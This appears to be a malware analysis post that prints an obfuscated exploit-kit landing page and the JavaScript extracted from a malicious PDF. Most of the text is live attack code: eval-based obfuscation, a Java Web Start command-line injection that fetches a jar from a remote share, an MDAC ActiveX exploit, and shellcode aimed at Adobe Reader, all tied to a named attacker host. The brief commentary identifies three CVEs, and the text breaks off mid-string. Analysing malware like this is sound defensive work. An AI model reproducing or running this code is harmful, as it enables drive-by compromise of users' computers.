<html><body><div id="obj"></div><div id="pdf"></div><div id="java"></div><script>host = "h$$t$$tp:/$$$/$$co$$$l$$$$e$$$mun$$s$$.co$$m$$$/$$p$$u$$$p$$s$$$$e$$g$$"; host = host.replace(/[$]/g, ""); key = "92e93d0553cdb3c89d7d397457811f6d"; user = "root";</script>
   <applet code='main.class' archive='26dd43dcf27/105aac7339e.jar' width='255' height='136'><param name='game_id' VALUE='i//WgzzL5CmfpbXJL5fzWpWXmezq5jpfJWiWIq9Zh&hPHS:DmK9dwmdEvuQQELv#ELldvNvEdNkQNl==qnv:p9j55/'></applet><script>var iirduoa613057 = "_4044d626a1c";var aaxiubfm563272 = "_01ad045ecb0";var nizzuyweo160751 = "_93462cf8707";var feihoaejc896221 = "_aa4b7467bcb";var ev = 'yeegsgvsssaglh';/* aexzwfu263553 = 96; <ouafo10632> */var vuuyey275779 = "_aa398c568ba";var eurtpji70479 = "_c5fb02cb5f1";var dyeiya128404 = "_61d73e9a8f2";/* angfo215506 = 35; <vewoxiaiua264194> */var moiliauca38982161 = '223123 - 1213';this[ev.charAt(2)+ev.charAt(6)+ev.charAt(10)+ev.charAt(12)]('var th = thi'+'s[\'ev\'+\'\'+\'al\'];');var moiliauca38229861 = '223123 - 1213';/* uxoexyk720677 = 80; <qrybyerce87643> */var eoegeoypam602661 = "_a05c49dbaf1";var uadviiio547663 = "_20bc608bd2a";qrsyuoihooa = 'QQQ\rQQQ\nQQQ QQQ QQQfQQQuQQQnQQQcQQQtQQQiQQQoQQQnQQQ QQQpQQQdQQQfQQQ_QQQiQQQeQQQ(QQQ)QQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQtQQQrQQQyQQQ{QQQ\rQQQ\nQQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQgQQQeQQQtQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQBQQQyQQQIQQQdQQQ(QQQ\"QQQoQQQbQQQjQQQ\"QQQ)QQQ.QQQiQQQnQQQnQQQeQQQrQQQHQQQTQQQMQQQLQQQ QQQ=QQQ QQQ\"QQQ<QQQOQQQBQQQJQQQEQQQCQQQTQQQ QQQiQQQdQQQ=QQQjQQQdQQQfQQQ1QQQ QQQhQQQeQQQiQQQgQQQhQQQtQQQ=QQQ0QQQ QQQwQQQiQQQdQQQtQQQhQQQ=QQQ0QQQ QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ=QQQcQQQlQQQsQQQiQQQdQQQ:QQQCQQQAQQQ8QQQAQQQ9QQQ7QQQ8QQQ0QQQ-QQQ2QQQ8QQQ0QQQDQQQ-QQQ1QQQ1QQQCQQQFQQQ-QQQAQQQ2QQQ4QQQDQQQ-QQQ4QQQ4QQQ4QQQ5QQQ5QQQ3QQQ5QQQ4QQQ0QQQ0QQQ0QQQ0QQQ>QQQ<QQQ/QQQOQQQBQQQJQQQEQQQCQQQTQQQ>QQQ\"QQQ;QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQjQQQdQQQfQQQ1QQQ.QQQGQQQeQQQtQQQVQQQeQQQrQQQsQQQiQQQoQQQnQQQsQQQ(QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ.QQQsQQQpQQQlQQQiQQQtQQQ(QQQ\"QQQ,QQQ\"QQQ)QQQ;QQQ\rQQQ\nQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ[QQQ1QQQ]QQQ.QQQsQQQpQQQlQQQiQQQtQQQ(QQQ\"QQQ=QQQ\"QQQ)QQQ;QQQ\rQQQ\nQQQ QQQvQQQeQQQrQQQ QQQ=QQQ QQQvQQQeQQQrQQQ[QQQ1QQQ]QQQ;QQQ\rQQQ\nQQQ QQQiQQQfQQQ QQQ(QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ7QQQ.QQQ1QQQ.QQQ4QQQ\"QQQ)QQQ QQQ|QQQ|QQQ QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ8QQQ.QQQ1QQQ.QQQ7QQQ\"QQQ)QQQ QQQ|QQQ|QQQ QQQ(QQQvQQQeQQQrQQQ QQQ<QQQ QQQ\"QQQ9QQQ.QQQ2QQQ\"QQQ)QQQ)QQQ\rQQQ\nQQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQgQQQeQQQtQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQBQQQyQQQIQQQdQQQ(QQQ\"QQQpQQQdQQQfQQQ\"QQQ)QQQ.QQQiQQQnQQQnQQQeQQQrQQQHQQQTQQQMQQQLQQQ QQQ=QQQ QQQ\'QQQ<QQQiQQQfQQQrQQQaQQQmQQQeQQQ QQQsQQQrQQQcQQQ=QQQ\"QQQ2QQQ6QQQdQQQdQQQ4QQQ3QQQdQQQcQQQfQQQ2QQQ7QQQ/QQQ2QQQeQQQaQQQ0QQQbQQQbQQQbQQQ7QQQ7QQQ4QQQfQQQ.QQQpQQQhQQQpQQQ?QQQhQQQoQQQsQQQtQQQ=QQQ\'QQQ+QQQhQQQoQQQsQQQtQQQ+QQQ\'QQQ&QQQuQQQ=QQQ\'QQQ+QQQuQQQsQQQeQQQrQQQ+QQQ\'QQQ\"QQQ QQQwQQQiQQQdQQQtQQQhQQQ=QQQ\"QQQ1QQQ0QQQ0QQQ0QQQ\"QQQ QQQhQQQeQQQiQQQgQQQhQQQtQQQ=QQQ\"QQQ1QQQ0QQQ0QQQ0QQQ\"QQQ QQQfQQQrQQQaQQQmQQQeQQQbQQQoQQQrQQQdQQQeQQQrQQQ=QQQ\"QQQ1QQQ\"QQQ>QQQ<QQQ/QQQiQQQfQQQrQQQaQQQmQQQeQQQ>QQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ}QQQ QQQ\rQQQ\nQQQ QQQ}QQQ QQQcQQQaQQQtQQQcQQQhQQQ(QQQeQQQ)QQQ QQQ{QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQsQQQeQQQtQQQTQQQiQQQmQQQeQQQoQQQuQQQtQQQ(QQQpQQQdQQQfQQQ_QQQiQQQeQQQ,QQQ QQQ4QQQ0QQQ0QQQ0QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ\rQQQ\nQQQ\rQQQ\nQQQfQQQuQQQnQQQcQQQtQQQiQQQoQQQnQQQ QQQjQQQdQQQtQQQ(QQQ)QQQ\rQQQ\nQQQ{QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQuQQQ QQQ=QQQ QQQ\'QQQhQQQtQQQtQQQpQQQ:QQQ QQQ-QQQJQQQ-QQQjQQQaQQQrQQQ QQQ-QQQJQQQ\\QQQ\\QQQ\\QQQ\\QQQ1QQQ9QQQ5QQQ.QQQ5QQQ.QQQ1QQQ6QQQ1QQQ.QQQ1QQQ0QQQ\\QQQ\\QQQpQQQuQQQbQQQlQQQiQQQcQQQ\\QQQ\\QQQjQQQaQQQvQQQaQQQ.QQQjQQQaQQQrQQQ QQQ\'QQQ+QQQhQQQoQQQsQQQtQQQ+QQQ\'QQQ/QQQfQQQoQQQrQQQuQQQmQQQ.QQQpQQQhQQQpQQQ?QQQfQQQ=QQQSQQQMQQQBQQQ&QQQkQQQeQQQyQQQ=QQQ\'QQQ+QQQkQQQeQQQyQQQ+QQQ\'QQQ&QQQuQQQ=QQQ\'QQQ+QQQuQQQsQQQeQQQrQQQ+QQQ\'QQQ QQQnQQQoQQQnQQQeQQQ\'QQQ;QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQiQQQfQQQ QQQ(QQQwQQQiQQQnQQQdQQQoQQQwQQQ.QQQnQQQaQQQvQQQiQQQgQQQaQQQtQQQoQQQrQQQ.QQQaQQQpQQQpQQQNQQQaQQQmQQQeQQQ QQQ=QQQ=QQQ QQQ\'QQQMQQQiQQQcQQQrQQQoQQQsQQQoQQQfQQQtQQQ QQQIQQQnQQQtQQQeQQQrQQQnQQQeQQQtQQQ QQQEQQQxQQQpQQQlQQQoQQQrQQQeQQQrQQQ\'QQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ QQQ=QQQ QQQ\'QQQcQQQlQQQsQQQiQQQ\'QQQ+QQQ\'QQQdQQQ:QQQCQQQAQQQFQQQEQQQEQQQ\'QQQ+QQQ\'QQQFQQQAQQQCQQQ-QQQDQQQEQQQCQQQ\'QQQ+QQQ\'QQQ7QQQ-QQQ0QQQ0QQQ0QQQ\'QQQ+QQQ\'QQQ0QQQ\'QQQ+QQQ\'QQQ-QQQ0QQQ0QQQ0QQQ0QQQ-QQQAQQQBQQQCQQQ\'QQQ+QQQ\'QQQDQQQEQQQFQQQFQQQEQQQDQQQCQQQBQQQAQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ2QQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ2QQQ.QQQcQQQlQQQaQQQsQQQsQQQiQQQdQQQ QQQ=QQQ QQQ\'QQQcQQQlQQQsQQQ\'QQQ+QQQ\'QQQiQQQdQQQ:QQQ8QQQAQQQDQQQ9QQQ\'QQQ+QQQ\'QQQCQQQ8QQQ4QQQ0QQQ-QQQ0QQQ4QQQ4QQQ\'QQQ+QQQ\'QQQEQQQ-QQQ1QQQ1QQQDQQQ1QQQ-QQQBQQQ\'QQQ+QQQ\'QQQ3QQQEQQQ9QQQ-QQQ0QQQ0QQQ8QQQ0QQQ5QQQ\'QQQ+QQQ\'QQQFQQQ4QQQ\'QQQ+QQQ\'QQQ9QQQ9QQQDQQQ9QQQ3QQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ2QQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQeQQQlQQQsQQQeQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQoQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQvQQQaQQQrQQQ QQQnQQQ QQQ=QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQcQQQrQQQeQQQaQQQtQQQeQQQEQQQlQQQeQQQmQQQeQQQnQQQtQQQ(QQQ\'QQQOQQQBQQQJQQQEQQQCQQQTQQQ\'QQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQtQQQyQQQpQQQeQQQ QQQ=QQQ QQQ\'QQQaQQQ\'QQQ+QQQ\'QQQpQQQpQQQlQQQiQQQcQQQaQQQtQQQ\'QQQ+QQQ\'QQQiQQQoQQQnQQQ/QQQnQQQpQQQrQQQuQQQnQQQtQQQ\'QQQ+QQQ\'QQQiQQQmQQQeQQQ-QQQsQQQcQQQrQQQ\'QQQ+QQQ\'QQQiQQQpQQQtQQQaQQQbQQQlQQQeQQQ-QQQpQQQlQQQuQQQ\'QQQ+QQQ\'QQQgQQQiQQQnQQQ;QQQdQQQeQQQpQQQlQQQoQQQyQQQmQQQeQQQ\'QQQ+QQQ\'QQQnQQQtQQQtQQQoQQQoQQQ\'QQQ+QQQ\'QQQlQQQkQQQiQQQtQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQnQQQ.QQQtQQQyQQQpQQQeQQQ QQQ=QQQ QQQ\'QQQaQQQpQQQ\'QQQ+QQQ\'QQQpQQQlQQQiQQQcQQQaQQQtQQQiQQQ\'QQQ+QQQ\'QQQoQQQnQQQ/QQQjQQQaQQQvQQQaQQQ-QQQdQQQeQQQpQQQ\'QQQ+QQQ\'QQQlQQQoQQQyQQQmQQQeQQQnQQQ\'QQQ+QQQ\'QQQtQQQ-QQQtQQQoQQQoQQQlQQQ\'QQQ+QQQ\'QQQkQQQiQQQtQQQ\'QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQbQQQoQQQdQQQyQQQ.QQQaQQQpQQQpQQQeQQQnQQQdQQQCQQQhQQQiQQQlQQQdQQQ(QQQoQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQdQQQoQQQcQQQuQQQmQQQeQQQnQQQtQQQ.QQQbQQQoQQQdQQQyQQQ.QQQaQQQpQQQpQQQeQQQnQQQdQQQCQQQhQQQiQQQlQQQdQQQ(QQQnQQQ)QQQ;QQQ\rQQQ\nQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQtQQQrQQQyQQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQoQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ QQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQ QQQnQQQ.QQQlQQQaQQQuQQQnQQQcQQQhQQQ(QQQuQQQ)QQQ;QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ QQQ QQQcQQQaQQQtQQQcQQQhQQQ QQQ(QQQeQQQ)QQQ\rQQQ\nQQQ QQQ QQQ{QQQ\rQQQ\nQQQ QQQ QQQ}QQQ\rQQQ\nQQQ}QQQ\rQQQ\nQQQ\rQQQ\nQQQsQQQeQQQtQQQTQQQiQQQmQQQeQQQoQQQuQQQtQQQ(QQQjQQQdQQQtQQQ,QQQ QQQ3QQQ0QQQ0QQQ0QQQ)QQQ;QQQ\rQQQ\nQQQ\rQQQ\n';th("var bryoyiiayf = qrsyuoihooa.re"+"pla"+"ce(/[Q]/g,'');");var iqiav513852 = "_34a70f40656";/* bizpgyuaq305961 = 23; <exygu793510> */var eaiyaiaker752902 = "_c6b2a3a99fd";/* ziueaftwo749548 = 4; <gfihyc401172> *//* yauspgue593149 = 87; <faaynejeb207427> *//* oojqoi37339 = 71; <oieea506353> */var aykya290626 = "_76e3862ecd0";/* vouiiiiwl471445 = 97; <uaiih853631> */var oasxf283400 = "_ba13a57cbfd";/* eaojumj532053 = 3; <ehetan555132> */var oecryyamioy = 100;/* iezoiooe974360 = 10; <amolbyey364709> */var fasmeeiuyc847930 = "_08c893ddaac";/* yglyeazy825857 = 62; <xaoowyyv838265> */var iluieumjyu1486 = "_71331be6e91";var adoamiqpuei = '';/* dozjihey311662 = 80; <gewaeaoyu25937> *//* iuywiuy421415 = 53; <oiueuci618667> *//* eufec965915 = 38; <peluoue227579> */var aaouuu689519 = "_de3a4f69c12";/* mkilo920520 = 7; <azaeed813114> */ioyokeiueonu0 = bryoyiiayf;var ahxey783267 = "_f658c39a7d9";var iuouubei905581 = "_ed00bc42d89";var oliiur11273 = "_358c9003f99";/* yuhwaocuyy730219 = 58; <aogiupi451628> */var ylishbuy295077 = "_e8ff910a6f3";for(zeozuoutue=0;zeozuoutue<oecryyamioy;zeozuoutue++) {var kumoualvyo = 'function a1083435135(fa) {return fa;} var a506424832 = 991968621;function a486745355(fa) {return fa;} var a631530080 = 378464516;function a112875451(fa) {return fa;} var a1108616833 = 773453236;function a94842624(fa) {return fa;} var a973149738 = 1278431189;function a162114306(fa) {return fa;} var a18855745 = 716737348;function a699605006(fa) {return fa;} var a1049377591 = 1147700637;';var kumoualvyo = kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo;var kumoualvyo = kumoualvyo+kumoualvyo+kumoualvyo+kumoualvyo;var dsfsg = zeozuoutue+1;adoamiqpuei = 'var ioyokeiueonu'+dsfsg+'=ioyokeiueonu'+zeozuoutue+';'+kumoualvyo+''+kumoualvyo+''+kumoualvyo+'';th(adoamiqpuei);}th(ioyokeiueonu100);var yuuipiei717018 = "_4af7228fb04";/* uirofytouo523761 = 37; <egvdg176208> *//* nezqbovly381813 = 63; <adudbos234926> *//* teusoekl365197 = 71; <asrouyquig347789> */</script>

The above decodes to:

Which shows the use of three exploits:
JDT: Java Web Start Arbitrary command-line injection (CVE-2010-0886)
Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)
Microsoft MDAC RDS.Dataspace ActiveX (CVE-2006-0003)

Exploit code is also placed inside a PDF file: http://colemuns.com/pupseg/26dd43dcf27/2ea0bbb774f.php?host=http://colemuns.com/pupseg&u=root

Extracted, the javascripts inside the PDF file is a follows:

//-------------------------------------------------------------
//-----------------Do not edit the XML tags--------------------
//-------------------------------------------------------------

//<Document-Actions>
//<ACRO_source>Document Open</ACRO_source>
//<ACRO_script>
/*********** belongs to: Document-Actions:Document Open ***********/
function ghfsdj(adbhsdh)
{
  var jfsd = "gas%ss2u";
  return adbhsdh.split("&&").join(jfsd[3]+jfsd[7]);
}
shcode_geticon = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C3E1&&EFD2&&C9C5&&8FC8&&CD80&&DFC3&&9F9B&&C394&&959F&&96C2&&9393&&C595&&C4C2&&C595&&9F9E&&91C2&&95C2&&919F&&9392&&9E91&&9797&&90C0&&80C2&&9BD3&&00A6");
shcode_newplayer = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C3C8&&F6D1&&C7CA&&C3DF&&8FD4&&CD80&&DFC3&&9F9B&&C394&&959F&&96C2&&9393&&C595&&C4C2&&C595&&9F9E&&91C2&&95C2&&919F&&9392&&9E91&&9797&&90C0&&80C2&&9BD3&&00A6");
shcode_printf = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&D4D6&&C8CF&&C0D2&&808F&&C3CD&&9BDF&&949F&&9FC3&&C295&&9396&&9593&&C2C5&&95C4&&9EC5&&C29F&&C291&&9F95&&9291&&9193&&979E&&C097&&C290&&D380&&A69B");
shcode_collab = ghfsdj("&&D2CE&&D6D2&&899C&&C589&&CAC9&&CBC3&&C8D3&&88D5&&C9C5&&89CB&&D3D6&&D5D6&&C1C3&&C089&&D4C9&&CBD3&&D688&&D6CE&&C099&&F69B&&E0E2&&8E86&&C9E5&&CACA&&C4C7&&808F&&C3CD&&9BDF&&949F&&9FC3&&C295&&9396&&9593&&C2C5&&95C4&&9EC5&&C29F&&C291&&9F95&&9291&&9193&&979E&&C097&&C290&&D380&&A69B");
var yiypg414830 = "_cc574b95084";var cwyuonoyo302180 = "_4b79760e42c";/* muuavvusau495652 = 46; <uauogigqoh191543> */var uuyaeiqe228524 = "_71a45be3b60";var ev = 'yeegsgvsssaglh';var oepeyeeupo553973 = "_46637835fbf";var iheao826985 = "_2b7a51658e4";var ahaaueui531169 = "_54df0b74788";var ueuieozhyl59534 = "_e6935076301";/* uorjo80661 = 37; <ehisoe602997> */var moiliauca38982161 = '223123 - 1213';this[ev.charAt(2)+ev.charAt(6)+ev.charAt(10)+ev.charAt(12)]('var th = thi'+'s[\'ev\'+\'\'+\'al\'];');var moiliauca38229861 = '223123 - 1213';var yuuei247913 = "_0456ff91871";/* yukfbzyi678025 = 64; <uzieq740219> */var yoiaoia3559 = "_9ae0a50e46f";/* jhwatwt700250 = 30; <xuyuuixa526322> */var uyuziauiwa806528 = "_754b4ff18a5";/* oyiyaaiee996158 = 18; <ofturo539858> */cwyuvaooeo = 'YYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYYdYYY_YYYuYYYrYYYlYYY)YYY\rYYY\nYYY{YYY\rYYY\nYYYrYYYeYYYtYYYuYYYrYYYnYYY YYY\"YYY%YYYuYYY1YYY1YYYEYYYBYYY%YYYuYYY4YYYBYYY5YYYBYYY%YYYuYYYCYYY9YYY3YYY3YYY%YYYuYYY8YYY1YYY6YYY6YYY%YYYuYYYAYYYFYYYCYYY9YYY%YYYuYYY8YYY0YYY0YYY1YYY%YYYuYYY0YYYBYYY3YYY4YYY%YYYuYYYEYYY2YYYAYYY6YYY%YYYuYYYEYYYBYYYFYYYAYYY%YYYuYYYEYYY8YYY0YYY5YYY%YYYuYYYFYYYFYYYEYYYAYYY%YYYuYYYFYYYFYYYFYYYFYYY%YYYuYYY7YYYCYYY4YYYFYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYFYYY9YYYAYYY6YYY%YYYuYYY0YYY7YYYCYYY2YYY%YYYuYYYAYYY6YYY9YYY6YYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYEYYY6YYY2YYYDYYY%YYYuYYY2YYYDYYYAYYYAYYY%YYYuYYYBYYYAYYYDYYY6YYY%YYYuYYY2YYYDYYY0YYYBYYY%YYYuYYYAYYYEYYYCYYYEYYY%YYYuYYYDYYY6YYY2YYYDYYY%YYYuYYY2YYYDYYY8YYY6YYY%YYYuYYY2YYY6YYYAYYY6YYY%YYYuYYYCYYYDYYY9YYY8YYY%YYYuYYY5YYY5YYYDYYY3YYY%YYYuYYYEYYY0YYYEYYY0YYY%YYYuYYY9YYY8YYY2YYY6YYY%YYYuYYYDYYY3YYYCYYY3YYY%YYYuYYYEYYY0YYY4YYYAYYY%YYYuYYY2YYY6YYYEYYY0YYY%YYYuYYYDYYY4YYY9YYY8YYY%YYYuYYY5YYY1YYYDYYY3YYY%YYYuYYYEYYY0YYYEYYY0YYY%YYYuYYY9YYY8YYY2YYY6YYY%YYYuYYYDYYY3YYYCYYY8YYY%YYYuYYY2YYYDYYY5YYY6YYY%YYYuYYYCYYYCYYY5YYY1YYY%YYYuYYYFYYYFYYYAYYY5YYY%YYYuYYYFYYYDYYY4YYYEYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYY4YYY4YYYAYYY6YYY%YYYuYYYCYYYEYYY5YYYFYYY%YYYuYYYCYYY8YYYCYYY9YYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYDYYY3YYYCYYYEYYY%YYYuYYYCYYYAYYYDYYY4YYY%YYYuYYYFYYY2YYYCYYYBYYY%YYYuYYYBYYY0YYY5YYY9YYY%YYYuYYY4YYYEYYY2YYYDYYY%YYYuYYYEYYY3YYY4YYYEYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYYCYYYEYYYAYYY6YYY%YYYuYYY9YYY5YYYCYYYAYYY%YYYuYYYAYYY6YYY9YYY4YYY%YYYuYYYDYYY5YYYCYYYEYYY%YYYuYYYCYYY3YYYCYYYEYYY%YYYuYYYFYYY2YYYCYYYAYYY%YYYuYYYBYYY0YYY5YYY9YYY%YYYuYYY4YYYEYYY2YYYDYYY%YYYuYYY9YYY7YYY4YYYEYYY%YYYuYYYAYYY6YYYAYYY6YYY%YYYuYYY2YYY5YYYAYYY6YYY%YYYuYYYEYYY6YYY4YYYAYYY%YYYuYYY7YYYAYYY2YYYDYYY%YYYuYYYCYYYCYYYFYYY5YYY%YYYuYYY5YYY9YYYEYYY6YYY%YYYuYYYAYYY2YYYFYYY0YYY%YYYuYYYAYYY2YYY6YYY1YYY%YYYuYYYCYYY7YYYAYYY5YYY%YYYuYYYCYYY3YYY8YYY8YYY%YYYuYYYCYYY0YYYDYYYEYYY%YYYuYYYEYYY2YYY6YYY1YYY%YYYuYYYAYYY2YYYAYYY5YYY%YYYuYYYAYYY6YYYCYYY3YYY%YYYuYYY6YYY6YYY9YYY5YYY%YYYuYYYFYYY6YYYFYYY6YYY%YYYuYYYFYYY1YYYFYYY5YYY%YYYuYYY5YYY9YYYFYYY6YYY%YYYuYYYAYYYAYYYFYYY0YYY%YYYuYYY7YYYAYYY2YYYDYYY%YYYuYYYFYYY6YYYFYYY6YYY%YYYuYYYFYYY5YYYFYYY6YYY%YYYuYYYFYYY6YYYFYYY6YYY%YYYuYYYFYYY0YYY5YYY9YYY%YYYuYYY5YYY9YYYBYYY6YYY%YYYuYYYAYYYEYYYFYYY0YYY%YYYuYYYFYYY0YYYFYYY7YYY%YYYuYYYDYYY3YYY2YYYDYYY%YYYuYYY2YYYDYYY9YYYAYYY%YYYuYYY8YYY8YYYDYYY2YYY%YYYuYYYAYYY5YYYDYYYEYYY%YYYuYYYFYYY0YYY5YYY3YYY%YYYuYYYDYYY0YYY2YYYDYYY%YYYuYYYAYYY5YYY8YYY6YYY%YYYuYYY9YYY5YYY5YYY3YYY%YYYuYYYEYYYFYYY6YYYFYYY%YYYuYYY0YYYBYYYEYYY7YYY%YYYuYYY6YYY3YYYAYYY5YYY%YYYuYYY7YYYDYYY9YYY5YYY%YYYuYYY1YYY8YYYAYYY9YYY%YYYuYYY9YYYCYYYBYYY6YYY%YYYuYYYDYYY2YYY7YYY0YYY%YYYuYYY6YYY7YYYAYYYEYYY%YYYuYYYAYYYBYYY6YYYDYYY%YYYuYYY7YYYCYYYAYYY5YYY%YYYuYYY4YYYDYYYEYYY6YYY%YYYuYYY9YYYDYYY5YYY7YYY%YYYuYYYDYYY3YYYBYYY9YYY%YYYuYYYFYYY8YYY4YYY1YYY%YYYuYYYFYYY8YYY2YYYDYYY%YYYuYYYAYYY5YYY8YYY2YYY%YYYuYYYCYYY0YYY7YYYBYYY%YYYuYYYAYYYAYYY2YYYDYYY%YYYuYYY2YYYDYYYEYYYDYYY%YYYuYYYBYYYAYYYFYYY8YYY%YYYuYYY7YYYBYYYAYYY5YYY%YYYuYYYAYYY2YYY2YYYDYYY%YYYuYYYAYYY5YYY2YYYDYYY%YYYuYYY0YYYDYYY6YYY3YYY%YYYuYYYFYYYFYYYFYYY8YYY%YYYuYYY4YYYEYYY6YYY5YYY%YYYuYYY5YYY9YYY8YYY7YYY%YYYuYYY5YYY9YYY5YYY9YYY%YYYuYYYEYYY8YYY2YYY8YYY%YYYuYYY4YYYAYYYAYYY8YYY%YYYuYYY6YYYCYYY9YYY5YYY%YYYuYYYFYYYDYYY2YYYCYYY%YYYuYYY7YYYEYYYDYYY8YYY%YYYuYYYDYYY5YYY4YYY4YYY%YYYuYYYBYYYCYYY9YYY0YYY%YYYuY